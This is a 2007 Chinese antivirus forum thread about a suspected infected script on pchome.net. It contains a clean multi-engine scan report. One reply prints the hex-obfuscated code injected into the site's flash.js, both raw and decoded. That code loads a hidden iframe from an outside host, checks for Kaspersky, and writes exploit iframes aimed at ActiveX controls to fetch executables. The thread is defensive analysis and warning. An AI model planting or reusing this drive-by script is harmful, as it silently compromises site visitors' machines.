查看: 2891|回复: 9
收起左侧

[已鉴定] 毒网?

 关闭 [复制链接]
小飞侠.net
发表于 2007-12-27 06:40:52 | 显示全部楼层 |阅读模式
ht tp://article.pchome.net/content-502393-7.html#topView

VirSCAN.org Scanned Report :
Scanned time   : 2007/12/27 06:26:57 (CST)
Scanner results: 全部的杀毒软件报告没有发现病毒!
File Name      : flash[1].rar
File Size      : 2363 byte
File Type      : RAR archive data, v1d, os
MD5            : 71f9fb97ec954d15663fda439f2d126a
SHA1           : 5af2e1502a19a6eaf9762db6b25ed782253488be
Online report  : ht tp://virscan.org/report/1776ac5a5206f8057221a56a5b537081.html

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      3.0.0.126       2007.12.25        2007-12-25  2.83   -
安博士V3       2007.12.27.00   2007.12.27        2007-12-27  0.90   -
AntiVir        7.6.0.46        7.0.1.156         2007-12-26  2.07   -
Arcavir        1.0.4           200712251803      2007-12-25  1.31   -
AVAST          1.0.8           071226-0          2007-12-26  3.06   -
AVG            7.5.49.442      269.17.9/1197     2007-12-25  1.92   -
BitDefender    7.60825.962328  7.16518           2007-12-26  3.50   -
CA (VET)       9.0.0.143       31.3.5405         2007-12-26  10.82  -
ClamAV         0.91.2          5260              2007-12-26  0.01   -
Comodo         2.11            2.0.0.385         2007-12-26  0.77   -
CP Secure      1.1.0.655       2007.12.26        2007-12-26  4.64   -
Dr.WEB         4.44.0.9170     2007.12.26        2007-12-26  3.39   -
ewido          4.0.0.2         2007.12.26        2007-12-26  1.92   -
F-PROT         4.4.1.52        20071225          2007-12-25  2.15   -
F-SECURE       5.51.6100       2007.12.26.03     2007-12-26  2.96   -
飞塔           2.81-3.11       8.449             2007-12-03  0.27   -
ViRobot        20071226        2007.12.26        2007-12-26  0.37   -
IKARUS         T3.1.01.15      2007.12.26.70053  2007-12-26  1.23   -
江民杀毒       10.00.650       2007.12.25        2007-12-25  1.34   -
卡巴斯基       5.5.10          2007.12.26        2007-12-26  4.72   -
金山毒霸       2007.6.20.249   2007.12.26        2007-12-26  0.65   -
迈克菲         5.2.00          5192              2007-12-24  12.86  -
MKS_VIR        2.01            2007.12.26        2007-12-26  8.55   -
NOD32          2.70.10         2747              2007-12-25  0.01   -
NORMAN         5.91.08         5.90              2007-12-25  4.43   -
熊猫卫士       9.04.03.0001    2007.12.25        2007-12-25  2.55   -
趋势           8.500-1001      4.912.21          2007-12-26  0.04   -
Prevx          V2              20071227          2007-12-27  3.55   -
QuickHeal      9.00            2007.12.26        2007-12-26  2.23   -
瑞星           19.0            20.24.21.00       2007-12-26  0.48   -
SOPHOS         2.49.1          4.21              2007-12-25  4.23   -
赛门铁克       1.3.0.24        20071225.004      2007-12-25  0.17   -
nProtect       2007-12-26.00   1102464           2007-12-26  4.18   -
The Hacker     6.2.9           v00169            2007-12-26  0.64   -
VBA32          3.12.2.5        20071226.1052     2007-12-26  0.80   -
VirusBuster    4.3.19:9        9.118.6/11.0      2007-12-26  1.02   -

11111111.rar

2.87 KB, 下载次数: 110

Graybird
发表于 2007-12-27 06:43:02 | 显示全部楼层
The file 'flash[2].js' has been determined to be 'CLEAN'. Our analysts did not discovered any malicious content.
卡江东N
发表于 2007-12-27 07:40:04 | 显示全部楼层
NOD32和AVG都不报。
y37007
发表于 2007-12-27 08:59:17 | 显示全部楼层
   没报
jimmyleo
发表于 2007-12-27 09:41:07 | 显示全部楼层
虽然pchome搭进搭出 但是这回是fil搭进了
dikex
发表于 2007-12-27 12:57:47 | 显示全部楼层
挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');

也就是这个了:

window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');

但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:

<script language="javascript" type="text/javascript">
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
</script>

有了这个,iframe就生效了;经过一番调用和解密后得:

function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}

挑了几个解密得:http://w18.vg/s.exe
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe
有点面熟的东西……

从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。
水晶
发表于 2007-12-27 12:58:37 | 显示全部楼层
不错费尔托斯安全软件
jimmyleo
发表于 2007-12-27 13:05:28 | 显示全部楼层
原来是这样啊 我去试试 反正用着max~
啊弥陀佛
发表于 2007-12-27 13:10:13 | 显示全部楼层
微点砍掉
未 命名.JPG
未命名.JPG
qigang
发表于 2007-12-27 20:17:39 | 显示全部楼层
哈哈,已经知道此事,样本也已经下载!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-14 15:17 , Processed in 0.129523 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表